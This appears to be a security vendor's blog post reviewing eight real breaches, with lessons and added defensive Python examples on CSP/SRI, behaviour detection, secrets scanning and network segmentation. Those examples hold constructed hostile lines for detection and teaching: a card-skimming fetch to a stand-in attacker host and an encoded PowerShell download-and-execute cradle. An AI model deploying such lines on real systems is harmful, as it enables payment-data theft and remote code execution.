8 Disastrous Cyber Attacks All SMEs Should Know About
“It’s good to learn from your mistakes. It’s better to learn from other people’s mistakes.” – Warren Buffett
It’s all well and good talking about cyber-incidents that can happen if you’re not careful. But when it comes down to it, the best lessons come from real-life events.
All of the cyber attacks on this list present very real lessons that all organisations can learn from – regardless of your size or your budget.
British Airways
22 lines of code. That’s all it took for criminals to steal personal information and payment card data from around 500,000 BA customers as they booked flights.
The attackers modified a script served on the airline’s own payment pages so that, as customers typed their details, a copy was sent to a server the criminals controlled, skimming the data on the fly (pun most definitely intended). Customers were none the wiser because their bookings still reached BA as normal. The skimmer ran in the customer’s browser, not on BA’s servers, and nothing on the page constrained which scripts could run or where they could send data. Under GDPR, the ICO announced its intention to fine BA an eye-watering £183m; the penalty was finalised at £20m in 2020.
What Can We Learn From the British Airways Incident?
Any site that contains a sensitive payment portal should use a WAF (Web Application Firewall) to monitor traffic and flag unusual activity. SonicWall’s SMA100 includes a WAF which acts as an intermediary between the open web and your web servers, carrying out packet inspection, data loss prevention, exploit detection, and more. Be clear about what it covers, though: a WAF sees traffic to and from your servers, whereas the BA skimmer ran in customers’ browsers and sent card data straight to the attackers’ domain, which a WAF never sees. The controls that address that are a Content-Security-Policy header that restricts which hosts page scripts may load from and connect to, Subresource Integrity hashes on the scripts you include, and monitoring for unexpected changes to the scripts served on payment pages.
It’s also worth investing in penetration testing on your website, in which vetted testers, working to an agreed scope and rules of engagement, try to gain access to your site’s sensitive systems the way an attacker would. Reputable “pentesters” won’t do anything untoward if they do find a way in; they report where your website’s security blind spots are so you can fix them.
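As an added example (not code from the original article, from BA, or from any SonicWall product), the script below shows the two browser-side controls in action: it computes a Subresource Integrity value for a script body and checks a tampered copy against it, then evaluates a Content-Security-Policy connect-src directive to show that a skimmer’s call home to a third-party host would be refused. The page origin, policy, script bodies and every host name are constructed for the example.

```python
# Added example (not from the original article): Subresource Integrity values and a
# minimal Content-Security-Policy evaluator, showing how a browser-side skimmer is
# caught. Every host name, policy and script body below is constructed (.test TLD).
import base64
import hashlib
import hmac
from urllib.parse import urlsplit


def sri_hash(source: bytes, algorithm: str = "sha384") -> str:
    """Return the value used in <script integrity="..."> for a script body."""
    if algorithm not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, source).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(source: bytes, expected: str) -> bool:
    """True only if the script body still matches the pinned integrity value."""
    algorithm = expected.partition("-")[0]
    try:
        return hmac.compare_digest(sri_hash(source, algorithm), expected)
    except ValueError:
        return False


def parse_csp(header: str) -> dict:
    """Turn 'directive src ...; directive src ...' into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _host_matches(pattern: str, host: str) -> bool:
    if pattern.startswith("*."):                   # "*.example.test" matches subdomains only
        return host.endswith(pattern[1:]) and len(host) > len(pattern) - 1
    return pattern == host


def connect_allowed(policy: dict, url: str, page_origin: str) -> bool:
    """Would fetch()/XHR/sendBeacon to `url` be permitted by connect-src?

    Falls back to default-src as browsers do. Handles 'self', 'none', '*' and
    host sources with optional scheme, port and a leading '*.' wildcard;
    path matching is omitted for brevity.
    """
    sources = policy.get("connect-src", policy.get("default-src", ["*"]))
    target, page = urlsplit(url), urlsplit(page_origin)
    for src in sources:
        if src == "'none'":
            return False
        if src == "*":
            return True
        if src == "'self'":
            if (target.scheme, target.hostname, target.port) == (page.scheme, page.hostname, page.port):
                return True
            continue
        scheme, sep, host_port = src.partition("://")
        if not sep:                                # bare host: any scheme
            scheme, host_port = "", src
        host, _, port = host_port.partition(":")
        if scheme and scheme.lower() != target.scheme:
            continue
        if port and port != str(target.port or ""):
            continue
        if _host_matches(host.lower(), target.hostname or ""):
            return True
    return False


# Constructed payment-page policy: scripts only from the site itself, and browser
# connections only to the site and its (made-up) payment processor.
PAGE_ORIGIN = "https://booking.example-airline.test"
PAYMENT_PAGE_CSP = (
    "default-src 'self'; script-src 'self'; "
    "connect-src 'self' https://api.example-processor.test; "
    "form-action 'self' https://api.example-processor.test"
)
# Constructed script bodies: the genuine one, and a copy with a skimmer appended
# that posts the whole card form to an attacker-controlled host.
LEGIT_SCRIPT = b"window.Booking = {validate: function (f) { return f.checkValidity(); }};"
SKIMMER = (b"fetch('https://collect.example-attacker.test/', {method: 'POST', "
           b"body: JSON.stringify(Object.fromEntries(new FormData(document.forms[0])))});")


def demo() -> dict:
    """Each value is True where the control would accept the script or allow the call."""
    pinned = sri_hash(LEGIT_SCRIPT)                # recorded when the page was built
    policy = parse_csp(PAYMENT_PAGE_CSP)
    return {
        "legit_script_passes_sri": verify_sri(LEGIT_SCRIPT, pinned),
        "tampered_script_passes_sri": verify_sri(LEGIT_SCRIPT + SKIMMER, pinned),
        "processor_call_allowed": connect_allowed(policy, "https://api.example-processor.test/charge", PAGE_ORIGIN),
        "skimmer_exfil_allowed": connect_allowed(policy, "https://collect.example-attacker.test/", PAGE_ORIGIN),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The SRI check only helps if the integrity attribute lives in HTML the attacker could not also edit, so it is strongest for scripts pulled from third-party hosts; the CSP check is what stops a skimmer injected into a first-party script from reporting home, and a `report-uri`/`report-to` directive on the same policy gives you an alert the moment a page tries.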
These measures are advisable for any business that receives sensitive payment info or personally identifying data through their website, but they’re especially advisable if you’re particularly well-known or prominent within your niche.
Nikkei
Japanese publisher Nikkei suffered a damaging malware attack that resulted in a breach of 12,514 personal records relating to staff and board members. An employee opened an email attachment that carried the malware, which then spread through the organisation’s network.
Japanese newspaper The Mainichi reported that “it took time [for Nikkei] to detect the anomaly because the virus was of a new type.”
What Can We Learn From the Nikkei Incident?
Every member of staff who uses an internet-connected computer should receive thorough phishing and cyber-awareness training, and it should be repeated rather than a one-off. Training or not, unexpected email attachments and shared files deserve suspicion, and staff need an easy way to report them so that the first person to spot an attempt is not the last to know about it.
Many modern firewalls – including SonicWall’s next generation firewalls – provide data leak prevention. This function monitors outgoing traffic for potentially sensitive data and stops it in its tracks. Note that it can only inspect what it can read: most outbound traffic is now encrypted, so TLS inspection has to be configured and, as the Equifax case later in this article shows, kept working.
“New types” of malware are not an unsolvable problem either. Signature-based detection (where your antivirus software compares files against a database of known threats) is increasingly inadequate on its own, because new variants appear every minute and a sample changed by a single byte has a brand new signature. It’s now much wiser to invest in endpoint and gateway tools that add sandboxing, behaviour monitoring and up-to-the-minute threat intelligence, so that an unknown sample is judged by what it does (a document opening a command shell, a script downloading and running code) rather than by what it looks like.
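The difference between the two approaches, as an added example that is not part of the original article or any vendor product: a few behaviour rules run over constructed process-creation events (the shape Sysmon or an EDR agent would record) for the email-attachment scenario above, alongside a hash blocklist that a trivially modified sample slips past. Host names, user names, file paths and the 203.0.113.10 address (an RFC 5737 documentation range) are all made up.

```python
# Added example (not from the original article): behaviour-based detection over
# constructed process-creation events, next to a signature check that a slightly
# modified sample evades. Hosts, users, paths and 203.0.113.10 are all made up.
import base64
import hashlib
import re
from typing import List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# -e / -ec / -enc / -encodedcommand all launch a base64 (UTF-16LE) command.
ENCODED_FLAG = re.compile(r"\s-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|FromBase64String",
    re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def detect(events: List[dict]) -> List[Tuple[int, str]]:
    """Apply the behaviour rules; return (event index, rule name) for each hit."""
    alerts = []
    for i, ev in enumerate(events):
        parent, image = basename(ev["parent"]), basename(ev["image"])
        # Rule 1: a document viewer has no business launching a shell or script host.
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append((i, "office_spawns_script_host"))
        # Rule 2: look inside encoded PowerShell for a download-and-execute cradle.
        payload = decode_encoded_command(ev["cmdline"])
        if payload and DOWNLOAD_CRADLE.search(payload):
            alerts.append((i, "encoded_download_cradle"))
        # Rule 3: the same cradle written in clear text.
        elif DOWNLOAD_CRADLE.search(ev["cmdline"]):
            alerts.append((i, "plain_download_cradle"))
    return alerts


# Signature-style check: a hash blocklist of samples that have already been seen.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed macro dropper, variant 1").hexdigest()}


def signature_match(sample: bytes) -> bool:
    return hashlib.sha256(sample).hexdigest() in KNOWN_BAD_SHA256


# Constructed telemetry for one phishing attachment opened from Outlook, followed
# by two benign events (a scheduled script and a user opening a normal document).
_CRADLE = '(New-Object Net.WebClient).DownloadString("http://203.0.113.10/p.ps1") | IEX'
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"host": "WS-FIN-07", "user": r"CORP\a.tanaka", "parent": OFFICE + r"\OUTLOOK.EXE",
     "image": OFFICE + r"\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\a.tanaka\AppData\Local\Temp\Invoice_0392.doc"'},
    {"host": "WS-FIN-07", "user": r"CORP\a.tanaka", "parent": OFFICE + r"\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell -nop -w hidden -enc {_ENCODED}"},
    {"host": "WS-FIN-07", "user": r"CORP\a.tanaka", "parent": r"C:\Windows\System32\cmd.exe",
     "image": PS, "cmdline": f"powershell -nop -w hidden -enc {_ENCODED}"},
    {"host": "WS-FIN-07", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\svchost.exe",
     "image": PS, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "WS-FIN-07", "user": r"CORP\a.tanaka", "parent": r"C:\Windows\explorer.exe",
     "image": OFFICE + r"\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" "C:\Users\a.tanaka\Documents\budget.docx"'},
]

if __name__ == "__main__":
    for index, rule in detect(EVENTS):
        print(f"event {index} on {EVENTS[index]['host']}: {rule}")
    print("variant 2 on blocklist:", signature_match(b"constructed macro dropper, variant 2"))
```

The second and third events trip the rules whatever the attachment’s hash is, while the blocklist only knows the one variant it has seen; a benign administrative PowerShell run with `-File` and a user opening a document from Explorer produce no alerts.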
Gilead Sciences Inc.
According to publicly-available records, hackers reportedly linked to Iran tried to infiltrate pharmaceutical firm Gilead. The records state that a top Gilead executive was sent a fake phishing-style login page. It’s Gilead company policy not to discuss cybersecurity matters, so reporters are unable to confirm whether the attack was successful or not.
This attack (or perhaps attempted attack) came at a crucial time for drug research worldwide – just a few months into the COVID-19 crisis.
What Can We Learn From the Gilead Incident?
Hopefully this attack was unsuccessful, but it just goes to show that phishing training is essential for all employees who interact with IT; that includes top level management, board members, and C-suite executives. In fact, the higher up the chain of command someone is, the sweeter prospect they become to a cybercriminal. Executives are highly visible and often have access to much more sensitive data than those further down the chain of command. Criminals are therefore likely to target high-profile execs using highly believable spear-phishing attacks.
Marriott Hotels/Marriott International
In 2018, Marriott suffered a crippling data breach that exposed highly sensitive personal information across around 339 million guest records. The ICO investigated the breach and proposed a colossal £99.2m fine (the final penalty, issued in 2020, was £18.4m).
The ICO’s investigation revealed that the Starwood hotels group had been subject to “unauthorised network access” since 2014, two years before Marriott acquired Starwood in 2016, and that the intrusion went undetected until 2018.
Marriott International intends to contest the fine and states that the Starwood database affected by the hack is no longer used for business operations.
What Can We Learn From the Marriott Incident?
Any IT that enters your company’s infrastructure needs to be properly vetted for cyber security readiness before connecting it to your network. This is especially important if the devices have been previously used or are in any way “second hand”.
The same goes for data that has been acquired through a purchase, acquisition, or merger. Audit all databases that come under your control – do you really need them? How safely is each database kept? That data is your responsibility now, so the onus is on you to keep it safe.
Do you use IoT (Internet of Things) or SCADA devices in your business? Check out our recent article “Everything You Need to Know About SCADA Cyber Security” for more insight into securing your networked smart devices.
Middlesex London Health Unit
Despite the confusingly British name, this actually happened in Canada. An Ontario-based public health organisation came under scrutiny from the region’s Privacy Commissioner for abandoning numerous laptops, PCs, and other electronics in a storage room following a move to new premises.
Photographs published by local news show bookcases laden with PCs, laptops, monitors, printers, fax machines and more. Many of the devices were found to still contain personally identifiable health records.
What Can We Learn From the Middlesex London Health Unit Incident?
Keep a detailed log of all of your hardware – no matter how small or inconsequential each device may seem. Note where each device is located, how it connects to your network/the internet, and who is responsible for that device’s safekeeping (especially important if your team works remotely).
Also keep track of what data is usually stored on or accessed by each device too. This way, if one device suddenly disappears, you’ll have a rough idea of what data may possibly be at risk.
When it comes to disposing of devices, always make sure you do so securely: wipe or physically destroy the storage media and keep the certificate of destruction. Seek the assistance of a secure IT disposal company rather than letting your gadgets rot in a storage room!
Düsseldorf University Hospital
On a more sombre note, this case highlights the very real, human cost of cybercrime. In September 2020 criminals launched a ransomware attack whose ransom note was addressed to the neighbouring Heinrich Heine University, not the hospital, but the hospital’s systems were encrypted nonetheless. Reports at the time said the attackers got in through a known vulnerability in a Citrix remote-access appliance for which a patch had been available since January of that year.
The attack stopped the hospital from accepting emergency patients, meaning that one patient had to be diverted to a hospital 20 miles away. The patient later passed away. The investigation is still ongoing at the time of writing, but police may treat the cyberattack as a homicide if this delay is found to have caused the patient’s death.
What Can We Learn From the Düsseldorf University Hospital Incident?
This incident teaches us that cybercrime isn’t just a case of stealing a few ones and zeroes. Cyber attacks can have a wide-reaching impact, possibly one that even the criminals don’t foresee, and good cyber preparedness protects livelihoods and, in cases like this, potentially lives. The attack wasn’t meant for the hospital, which shows how easily malware spreads beyond its intended target. Healthcare organisations are frequently targeted, so in this sector the basics matter most: patch internet-facing systems promptly, keep tested backups that an attacker on the network cannot reach, and rehearse how to keep operating when the IT is gone.
Equifax
In 2017, hackers stole the personal records of roughly 147 million people from Equifax, a credit bureau that assesses people’s credit scores across the globe. Though the attack hit its US systems, some UK customer data was affected too.
The criminals initially broke into an online consumer dispute portal through a known vulnerability in Apache Struts (CVE-2017-5638) for which a patch had been available for around two months; it hadn’t been applied. Once they were “in”, they were able to move freely to other servers because Equifax’s systems weren’t adequately ring-fenced from each other, and they found login credentials stored in plain text that helped them reach further databases.
The criminals pulled data out of Equifax’s systems for around two and a half months without detection. The outbound traffic was encrypted, and the device that was supposed to decrypt and inspect it had been running with an expired certificate for months, so it inspected nothing; the intrusion was spotted shortly after the certificate was finally renewed.
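Plain-text credentials in configuration files are the kind of thing a short scan of your own servers finds before an intruder does. As an added example that is not code from the original article or from Equifax, the scanner below runs over two constructed configuration snippets: one with a password and an access key written in, and the hardened equivalent that only references values injected from a secrets store at start-up. Host names are made up, and the AKIA… value is the example key published in AWS’s own documentation, not a live credential.

```python
# Added example (not from the original article): a small scanner for plain-text
# credentials in configuration files, run over two constructed config snippets.
# Host names are made up; the AKIA... value is AWS's published documentation example.
import math
import re
from typing import List

SECRET_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private_key", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    # key = value / key: value, for the usual credential key names
    ("assigned_secret", re.compile(
        r"(?i)\b(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*['\"]?([^\s'\";]+)")),
]
# Values that reference a secret rather than contain one: ${VAR}, <placeholder>,
# {{ template }} or obvious dummies.
PLACEHOLDER = re.compile(
    r"^(?:\$\{?[A-Za-z_][A-Za-z0-9_]*\}?|<[^>]+>|\{\{.*\}\}|changeme|x{3,}|\*{3,})$", re.I)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; generated secrets score higher than words."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(value: str) -> str:
    """Never copy the secret itself into a finding, log or ticket."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "****"


def scan(text: str, source: str = "<memory>") -> List[dict]:
    """Return one finding per line that appears to contain a live secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if name == "assigned_secret" and (
                    PLACEHOLDER.match(value) or len(value) < 8 or shannon_entropy(value) < 2.5):
                continue            # a reference or a dummy, not a credential
            findings.append({"source": source, "line": lineno, "type": name, "preview": redact(value)})
            break                   # one finding per line is enough
    return findings


# Constructed: the kind of connection file found on an internal application server...
INSECURE_CONFIG = """\
[dispute_portal_db]
host = db01.corp.example
username = svc_portal
password = Summer2017!

[reporting_export]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
"""

# ...and the same file with the secrets supplied at start-up from a secrets store.
HARDENED_CONFIG = """\
[dispute_portal_db]
host = db01.corp.example
username = svc_portal
password = ${DB_PASSWORD}

[reporting_export]
aws_access_key_id = ${AWS_ACCESS_KEY_ID}
"""

if __name__ == "__main__":
    for label, cfg in (("insecure", INSECURE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, scan(cfg, source=f"{label}.ini") or "no findings")
```

Run the same function over your real configuration directories and repositories; the placeholder and entropy checks keep noise down, and the redacted preview means the report itself does not become another place the secret lives.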
And potentially the worst part? Even after this delay, Equifax didn’t go public about the breach until over a month after it was discovered. Top execs also sold off stocks around this time, giving rise to insider trading suspicions.
What Can We Learn From the Equifax Incident?
Use a reliable Web Application Firewall to protect any potentially sensitive web portals, especially ones that connect to more sensitive servers and systems, but don’t treat it as a substitute for patching: keep an inventory of your internet-facing software and apply fixes for known, actively exploited vulnerabilities within days, not months. Make IT and data security a top priority across the board, whether that relates to software, firmware, certificate renewals, or acting on the suggestions of IT security advisors.
Keep your networked and cloud storage repositories protected with appropriate firewalling and data leak prevention tools. Work regularly with penetration testers to root out your online and internal network vulnerabilities and act on their suggestions immediately. And have a complete, documented plan for what to do when things go wrong, including team responsibilities, legal implications, and a PR crisis plan.
WannaCry and the NHS
The 2017 WannaCry ransomware attack hit the NHS so badly that it was left with a £73m IT bill. WannaCry was a worm: it spread from machine to machine over the SMB file-sharing protocol (TCP port 445) using a Windows vulnerability that Microsoft had patched two months earlier, so unpatched and unsupported systems were hit hardest.
One aspect that stood out to us was the sheer amount of older IT still in use by the NHS, with 2,300 devices reportedly still running Windows XP more than two years after the attack. That’s only 0.16% of the whole IT estate, but a weak link is a weak link. These older devices are thought to remain in use because the software they run is incompatible with newer versions of Windows, and that software drives expensive equipment such as MRI scanners.
What Can We Learn From the WannaCry Incident?
Security firms like us can tell you to get rid of old, unsupported IT until the cows come home, but that doesn’t always reflect a practical reality for a lot of organisations. Sometimes older or insecure devices are needed to carry out business-critical tasks – often relating to Internet of Things devices or compatibility issues.
If you must use EOL (End of Life) or bare-bones networked devices, make sure they sit behind your firewall, not directly on the internet, and ideally on their own network segment with rules that permit only the specific systems and ports they need and nothing else, inbound or outbound. WannaCry spread on TCP port 445, so that port in particular should never be reachable on such devices from anything other than the designated servers. Firewalls should be replaced every five years at least and should include next-gen features like data leak prevention tools, intrusion prevention systems, and a strong heuristic gateway antivirus to keep as-yet unknown threats at bay.
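What “behind the firewall, on its own segment” means in rule terms, as an added example that is not code from the original article or from any firewall vendor: a first-match packet-filter evaluator compares a flat network (no filtering between hosts) with a segmented design for a legacy imaging VLAN, where only the imaging server, the PACS port and a vendor jump host are reachable and the legacy hosts have no route out. The VLAN, server addresses, ports and sample flows are constructed (RFC 1918 and RFC 5737 ranges).

```python
# Added example (not from the original article): a first-match packet-filter
# evaluator comparing a flat network with a segmented one for a legacy
# (end-of-life) imaging VLAN. All addresses are RFC 1918 / RFC 5737 and made up.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    src: str                     # CIDR or "any"
    dst: str                     # CIDR or "any"
    proto: str = "any"           # "tcp", "udp" or "any"
    dport: Optional[int] = None  # None = any destination port
    note: str = ""


def _in(addr: str, cidr: str) -> bool:
    return cidr == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(cidr, strict=False)


def evaluate(rules: List[Rule], src: str, dst: str, proto: str, dport: int, default: str = "deny") -> str:
    """Return the action of the first rule matching the flow, else the default."""
    for r in rules:
        if (_in(src, r.src) and _in(dst, r.dst)
                and r.proto in ("any", proto) and r.dport in (None, dport)):
            return r.action
    return default


LEGACY_VLAN = "10.20.30.0/24"      # XP-era workstations driving imaging equipment
IMAGING_SERVER = "10.10.5.20/32"   # the one system that needs to talk to them
JUMP_HOST = "10.10.5.21/32"        # admin access for the vendor engineer

# "Before": one flat network, nothing filtered between hosts (default allow).
FLAT_RULES: List[Rule] = []

# "After": only the named flows are permitted; everything else is dropped in both
# directions, so SMB (tcp/445, WannaCry's spreading vector) is unreachable from the
# internet and from the rest of the office network.
SEGMENTED_RULES = [
    Rule("allow", IMAGING_SERVER, LEGACY_VLAN, "tcp", 445, "image store share"),
    Rule("allow", LEGACY_VLAN, IMAGING_SERVER, "tcp", 104, "DICOM send to PACS"),
    Rule("allow", JUMP_HOST, LEGACY_VLAN, "tcp", 3389, "vendor remote support"),
    Rule("deny", "any", LEGACY_VLAN, note="nothing else may reach the legacy VLAN"),
    Rule("deny", LEGACY_VLAN, "any", note="legacy hosts get no internet or east-west access"),
]


def flat_network(src: str, dst: str, proto: str, dport: int) -> str:
    return evaluate(FLAT_RULES, src, dst, proto, dport, default="allow")


def segmented_network(src: str, dst: str, proto: str, dport: int) -> str:
    return evaluate(SEGMENTED_RULES, src, dst, proto, dport, default="deny")


# Constructed sample flows: (src, dst, proto, dport).
SAMPLE_FLOWS = [
    ("198.51.100.7", "10.20.30.15", "tcp", 445),   # SMB probe from the internet
    ("10.10.99.42", "10.20.30.15", "tcp", 445),    # SMB from an infected office PC
    ("10.10.5.20", "10.20.30.15", "tcp", 445),     # imaging server share access
    ("10.20.30.15", "10.10.5.20", "tcp", 104),     # scanner sending images
    ("10.20.30.15", "198.51.100.7", "tcp", 443),   # legacy host calling out
    ("10.10.5.21", "10.20.30.15", "tcp", 3389),    # vendor RDP via jump host
]


def compare() -> List[Tuple[tuple, str, str]]:
    """(flow, flat decision, segmented decision) for each sample flow."""
    return [(f, flat_network(*f), segmented_network(*f)) for f in SAMPLE_FLOWS]


if __name__ == "__main__":
    for flow, flat, seg in compare():
        print(f"{flow[0]:>14} -> {flow[1]:<14} {flow[2]}/{flow[3]:<5} flat={flat:<5} segmented={seg}")
```

One caveat the evaluator makes visible: the `deny any -> LEGACY_VLAN` rule only bites on traffic the firewall actually sees. Two legacy hosts on the same VLAN talk to each other without crossing it, so stopping a worm from hopping between them needs either a private VLAN, one host per segment, or the host’s own firewall blocking inbound 445.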
We know that this all sounds like an uphill battle. But it’s surprisingly simple with the right security partners on your side. Reach out to us today and claim your free business cyber health check – it only takes an hour of your time and there’s no pressure to buy anything. Claim yours today!